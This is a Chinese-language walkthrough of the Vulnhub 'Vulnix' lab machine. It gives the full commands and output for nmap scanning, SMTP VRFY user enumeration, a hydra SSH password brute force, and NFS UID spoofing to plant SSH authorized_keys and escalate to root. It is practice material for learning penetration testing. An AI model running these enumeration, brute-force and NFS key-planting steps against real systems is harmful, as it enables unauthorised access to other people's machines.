Vulnhub-Vulnix靶场渗透
目标发现
由于是在同一网络下的靶机,那么可以使用arp-scan进行扫描发现目标:
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 00:50:56:c0:00:08 (Unknown)
192.168.56.2 00:50:56:ea:c1:ad (Unknown)
192.168.56.130 00:0c:29:24:7f:60 (Unknown)
192.168.56.254 00:50:56:e0:f2:49 (Unknown)
8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.901 seconds (134.67 hosts/sec). 4 responded
排除一些已知IP可以得知目标为192.168.56.130
PS:也可以通过
netdiscover -r <ip>进行主机发现。
信息搜集
端口扫描
先使用nmap进行开放端口扫描,探测已开放端口:
┌──(kali㉿kali)-[~]
└─$ nmap -sS -p- 192.168.56.130 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 22:20 EST
Nmap scan report for 192.168.56.130
Host is up (0.0024s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
34261/tcp open unknown
38838/tcp open unknown
40311/tcp open unknown
53813/tcp open unknown
54118/tcp open unknown
MAC Address: 00:0C:29:24:7F:60 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
再进行开放端口服务识别:
PS:在进行服务类型识别时需要添加一个没有开放的端口供工具识别开放关闭端口直接的响应差异
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p22,25,79,110,111,143,512,513,514,993,995,2049,34261,38838,40311,53813,54118,2 -A 192.168.56.130 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 23:44 EST
Nmap scan report for 192.168.56.130
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
2/tcp closed compressnet
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2026-02-05T04:46:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after: 2022-08-31T17:40:12
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_pop3-capabilities: PIPELINING TOP RESP-CODES UIDL SASL CAPA STLS
|_ssl-date: 2026-02-05T04:46:13+00:00; 0s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100005 1,2,3 38838/tcp mountd
| 100005 1,2,3 40979/tcp6 mountd
| 100005 1,2,3 42607/udp mountd
| 100005 1,2,3 47811/udp6 mountd
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_ssl-date: 2026-02-05T04:46:13+00:00; -1s from scanner time.
|_imap-capabilities: IDLE more have listed post-login capabilities IMAP4rev1 SASL-IR Pre-login LITERAL+ OK ID LOGIN-REFERRALS LOGINDISABLEDA0001 ENABLE STARTTLS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_imap-capabilities: IDLE AUTH=PLAINA0001 listed post-login more IMAP4rev1 SASL-IR have LITERAL+ OK ID capabilities Pre-login ENABLE LOGIN-REFERRALS
|_ssl-date: 2026-02-05T04:46:13+00:00; 0s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP RESP-CODES UIDL USER CAPA SASL(PLAIN)
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2026-02-05T04:46:13+00:00; 0s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
34261/tcp open mountd 1-3 (RPC #100005)
38838/tcp open mountd 1-3 (RPC #100005)
40311/tcp open mountd 1-3 (RPC #100005)
53813/tcp open nlockmgr 1-4 (RPC #100021)
54118/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:24:7F:60 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.56.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.89 seconds
可以发现里面有一些关键信息:
- 端口2049 (NFS) - 网络文件系统,允许远程挂载文件系统
- 端口111 (rpcbind) - RPC服务,NFS依赖它
- 端口22 (SSH) - 最终的登录目标
- 端口79 (finger) - 用户信息枚举
- 端口25(smtp)- 邮件服务
- 系统信息 - Linux 2.6.32 - 3.10
NFS挂载
枚举目标共享的nfs目录有哪些:
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.130
Export list for 192.168.56.130:
/home/vulnix *
可以看到存在目标存在配置错误,任意主机(*)都可以将目标的/home/vulnix目录挂载到本地。
将目标挂载到本地:
# 创建挂载点
mkdir /tmp/vulnix_nfs
# 挂载
sudo mount -t nfs 192.168.56.130:/home/vulnix /tmp/vulnix_nfs
但在查看内容的时候发现没有权限:
┌──(kali㉿kali)-[~]
└─$ ls -la /tmp/vulnix_nfs
ls: 无法打开目录 '/tmp/vulnix_nfs': 权限不够
┌──(kali㉿kali)-[~]
└─$ sudo ls -la /tmp/vulnix_nfs
[sudo] kali 的密码:
ls: 无法打开目录 '/tmp/vulnix_nfs': 权限不够
这里的权限不足可能与文件所有者UID与GID信息不一致从而被拒绝访问有关,而且共享的目录是在home下的用户目录,那么这个文件应该是属于vulnix的,那么需要进行一些用户信息探测,是否能找到泄露的vulnix的UID和GID。
邮件服务
通过扫描发现目标存在smtp服务,通过nmap的脚本进行探测:
┌──(kali㉿kali)-[~]
└─$ nmap --script=*smtp* -p 25 192.168.56.130
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-09 21:04 EST
Nmap scan report for 192.168.56.130
Host is up (0.0011s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
MAC Address: 00:0C:29:24:7F:60 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.14 seconds
从里面可以得知:
smtp-enum-users脚本无法枚举用户- 邮件服务器并未使用
Exim软件,无法使用CVE漏洞攻击(因为Exploit DB中的大部分有效漏洞都是Exim的) - 靶机的
SMTP服务支持以下命令:vulnix、PIPELINING、SIZE、VRFY、ETRN、STARTTLS、ENHANCEDSTATUSCODES、8BITMIME、DSN
其中支持的命令中的VRFY可以用于枚举用户:
| SMTP命令 | 命令功能 |
|---|---|
| MAIL FROM | 指定发件人地址 |
| RCPT TO | 指定单个的邮件接收人;可有多个 RCPT TO;常在 MAIL FROM命令之后 |
| VRFY | 用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令 |
| EXPN | 验证给定的邮箱列表是否存在,也常被禁用 |
执行命令后会有返回码进行状态确认:
| 返回码 | 含义 |
|---|---|
| 250 | 要求的邮件操作完成 |
| 550 | 要求的邮件操作未完成,邮箱不可用(例如,邮箱未找到,或不可访问) |
那么可以使用smtp-enum-users工具进行用户枚举,字典选用/usr/share/wordlists/metasploit下的unix_users.txt:
┌──(kali㉿kali)-[~/Work]
└─$ sudo smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.56.130 > ./smtp用户扫描结果.txt
[sudo] kali 的密码:
┌──(kali㉿kali)-[~/Work]
└─$ cat smtp用户扫描结果.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/unix_users.txt
Target count ............. 1
Username count ........... 175
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Mon Feb 9 21:10:31 2026 #########
192.168.56.130: backup exists
192.168.56.130: bin exists
192.168.56.130: daemon exists
192.168.56.130: games exists
192.168.56.130: gnats exists
192.168.56.130: irc exists
192.168.56.130: libuuid exists
192.168.56.130: landscape exists
192.168.56.130: list exists
192.168.56.130: lp exists
192.168.56.130: mail exists
192.168.56.130: messagebus exists
192.168.56.130: man exists
192.168.56.130: nobody exists
192.168.56.130: news exists
192.168.56.130: postfix exists
192.168.56.130: postmaster exists
192.168.56.130: proxy exists
192.168.56.130: ROOT exists
192.168.56.130: root exists
192.168.56.130: sshd exists
192.168.56.130: sync exists
192.168.56.130: sys exists
192.168.56.130: syslog exists
192.168.56.130: user exists
192.168.56.130: uucp exists
192.168.56.130: whoopsie exists
192.168.56.130: www-data exists
######## Scan completed at Mon Feb 9 21:10:34 2026 #########
28 results.
175 queries in 3 seconds (58.3 queries / sec)
┌──(kali㉿kali)-[~/Work]
└─$ sudo smtp-user-enum -M VRFY -u vulnix -t 192.168.56.130
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Mon Feb 9 21:24:09 2026 #########
192.168.56.130: vulnix exists
######## Scan completed at Mon Feb 9 21:24:09 2026 #########
1 results.
1 queries in 1 seconds (1.0 queries / sec)
总计发现了29个账户。其中root、ROOT和user账户比较显眼,vulnix为前面发现在nfs共享的用户目录,除了root账户,判断它们是使用者而非系统建立的。
finger服务
Finger是一个用于获取本地或远程计算机用户信息的Linux服务。当在本地主机执行finger命令之后,将会返回本地计算机所有的用户信息(包括用户名、最近登录时间、电话等),远程同理。如果指定要查看的具体用户名,将会返回更加详细的信息。
命令格式:finger [选项] [用户名@主机名]
┌──(kali㉿kali)-[~/Work]
└─$ finger {backup,bin,daemon,games,gnats,irc,landscape,libuuid,list,lp,mail,messagebus,man,news,nobody,postfix,postmaster,proxy,root,ROOT,sshd,sync,sys,syslog,user,uucp,whoopsie,www-data,vulnix}@192.168.56.130
Login: backup Name: backup
Directory: /var/backups Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: bin Name: bin
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: daemon Name: daemon
Directory: /usr/sbin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: games Name: games
Directory: /usr/games Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: gnats Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: irc Name: ircd
Directory: /var/run/ircd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: landscape Name:
Directory: /var/lib/landscape Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: libuuid Name:
Directory: /var/lib/libuuid Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: list Name: Mailing List Manager
Directory: /var/list Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: lp Name: lp
Directory: /var/spool/lpd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: mail Name: mail
Directory: /var/mail Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: dovecot Name: Dovecot mail server
Directory: /usr/lib/dovecot Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: messagebus Name:
Directory: /var/run/dbus Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: man Name: man
Directory: /var/cache/man Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: news Name: news
Directory: /var/spool/news Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: nobody Name: nobody
Directory: /nonexistent Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: postfix Name:
Directory: /var/spool/postfix Shell: /bin/false
Never logged in.
No mail.
No Plan.
finger: postmaster: no such user.
Login: proxy Name: proxy
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.
finger: ROOT: no such user.
Login: sshd Name:
Directory: /var/run/sshd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: sync Name: sync
Directory: /bin Shell: /bin/sync
Never logged in.
No mail.
No Plan.
Login: sys Name: sys
Directory: /dev Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: syslog Name:
Directory: /home/syslog Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: uucp Name: uucp
Directory: /var/spool/uucp Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: whoopsie Name:
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
Login: www-data Name: www-data
Directory: /var/www Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
没找到什么有效信息。
渗透测试
ssh爆破
到目前为止,没有得到任何有用的、可以被利用的有效信息,也没有可以尝试的web服务,那么现在尝试ssh的用户爆破了,在前面信息搜集时发现了 root、ROOT、user、vulnix 这四个用户可以被尝试,使用字典 /usr/share/wordlists/metasploit/unix_passwords.txt 或者 rockyou.txt 进行爆破。
┌──(kali㉿kali)-[~/Work]
└─$ sudo hydra -L ./userlist -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 10 ssh://192.168.56.130
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-09 22:00:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 4084 login tries (l:4/p:1021), ~409 tries per task
[DATA] attacking ssh://192.168.56.130:22/
[STATUS] 237.00 tries/min, 237 tries in 00:01h, 3847 to do in 00:17h, 10 active
[STATUS] 242.00 tries/min, 726 tries in 00:03h, 3358 to do in 00:14h, 10 active
[STATUS] 239.71 tries/min, 1678 tries in 00:07h, 2406 to do in 00:11h, 10 active
[22][ssh] host: 192.168.56.130 login: user password: letmein
[STATUS] 285.58 tries/min, 3427 tries in 00:12h, 657 to do in 00:03h, 10 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-09 22:15:40
得到了一个用户凭据:user:letmein
那就使用该账户进行登录,看能不能进行下一步利用:
┌──(kali㉿kali)-[~]
└─$ ssh user@192.168.56.130
user@192.168.56.130's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Feb 10 06:05:15 GMT 2026
System load: 0.0 Processes: 89
Usage of /: 90.3% of 773MB Users logged in: 0
Memory usage: 8% IP address for eth0: 192.168.56.130
Swap usage: 0%
=> / is using 90.3% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
user@vulnix:~$ whoami
user
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
后渗透
本地信息搜集
现在有了一个初始账户后,就需要尝试提权,而经过测试发现user用户无法使用sudo:
因此可以使用脚本 linux-exploit-suggester.sh 或者 peass-ng_辅助提权工具 进行本地信息搜集,从而给出可能的提权方案,这里使用peass-ng:
# 将linpeas.sh上传、赋予执行权限并执行
chmod +x linpeas.sh
./linpeas.sh
可能的提权方式:
用户和组信息:
计划任务:
到这里,除了利用一些可能导致系统崩溃的内核漏洞以外没有什么可进行提权的点,但从得到的用户和组信息中可以看到之前nfs共享的vulnix用户的id为2008,那么可以尝试在本地创建一个同id的同名用户尝试访问目标的nfs服务。
NFS挂载提权
前面已经挂载了那么就只需要创建一个同id的用户,可以看到现在就有权限访问nfs共享目录了:
┌──(kali㉿kali)-[~]
└─$ sudo groupadd -g 2008 nfsattack
┌──(kali㉿kali)-[~]
└─$ sudo adduser --uid 2008 --gid 2008 nfsattack
新的密码:
重新输入新的密码:
passwd:已成功更新密码
正在改变 nfsattack 的用户信息
请输入新值,或直接敲回车键以使用默认值
全名 []:
房间号码 []:
工作电话 []:
家庭电话 []:
其它 []:
Is the information correct? [Y/n]
┌──(kali㉿kali)-[~]
└─$ ls /tmp
vulnix_nfs
┌──(kali㉿kali)-[~]
└─$ su nfsattack
密码:
┌──(nfsattack㉿kali)-[/home/kali]
└─$ ls -al /tmp/vulnix_nfs/
总计 16
drwxr-x--- 2 nobody nogroup 4096 2012年 9月 2日 .
drwxrwxrwt 13 root root 320 2月10日 02:39 ..
-rw-r--r-- 1 nobody nogroup 220 2012年 4月 3日 .bash_logout
-rw-r--r-- 1 nobody nogroup 3486 2012年 4月 3日 .bashrc
-rw-r--r-- 1 nobody nogroup 675 2012年 4月 3日 .profile
里面啥有效文件都没有,但可以创建文件:
那么尝试上传ssh公钥进行ssh登录vulnix用户,首先切换至原用户,使用ssh-keygen命令生成公私钥,并将公钥文件改名为authorized_keys上传,权限为600:
ssh-keygen -t ecdsa -f /tmp/vulnix_key -N ""
su nfsattack
cd /tmp/vulnix_nfs/
mkdir .ssh
cat /tmp/vulnix_key.pub > .ssh/authorized_keys
chmod 700 .ssh
chmod 600 .ssh/authorized_keys
ls -la .ssh/
exit
ssh -i /tmp/vulnix_key vulnix@192.168.56.130
PS:但需要注意的是目标主机的ssh版本较低,不支持新版ssh的RSA算法,所以需要在生成密钥时使用ECDSA或ED25519。
user@vulnix:/tmp$ ssh -version OpenSSH_5.9p1 Debian-5ubuntu1, OpenSSL 1.0.1 14 Mar 2012 Bad escape character 'rsion'.
成功以vulnix身份登入目标系统:
使用 sudo -l 指令查看发现可以不需要密码修改NFS配置文件/etc/exports:
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
那么就可以直接编辑配置文件将root目录添加到NFS共享:
sudoedit /etc/exports
然后需要重启靶机才能生效设置,重启后重新挂载nfs目录:
# 出现了添加的/root目录
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.130
Export list for 192.168.56.130:
/root *
/home/vulnix *
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.130:/root /tmp/vulnix_nfs
然后和前面一样将ssh公钥上传值nfs共享目录,不过这次需要登录为root用户才能进入到nfs共享目录:
sudo su
mkdir .ssh
cat /tmp/vulnix_key.pub > .ssh/authorized_keys
chmod 700 .ssh
chmod 600 .ssh/authorized_keys
ls -la .ssh/
成功以root身份登入目标:
读取flag
flag文件在root目录下,其实前面在能访问挂载的root目录时即可访问flag文件了:
root@vulnix:~# ls /root/
trophy.txt
root@vulnix:~# cat /root/trophy.txt
cc614640424f5bd60ce5d5264899c3be
总结
这个靶场的主要考点是SMTP的配置错误、NFS共享配置错误、以及ssh写公钥的利用,通过SMTP的VRFY进行用户枚举,然后对可能是真实用户的用户进行密码爆破,配合利用NFS的共享权限进行逐步提权。
但这个靶场的最后的提权手法不太具有实战性,从后面的添加/root目录作为NFS共享目录的操作可以看到是需要将目标主机重启的,实战中不可能将目标主机重启,而且目标主机的运维人员一般也不会重启主机。
浙公网安备 33010602011771号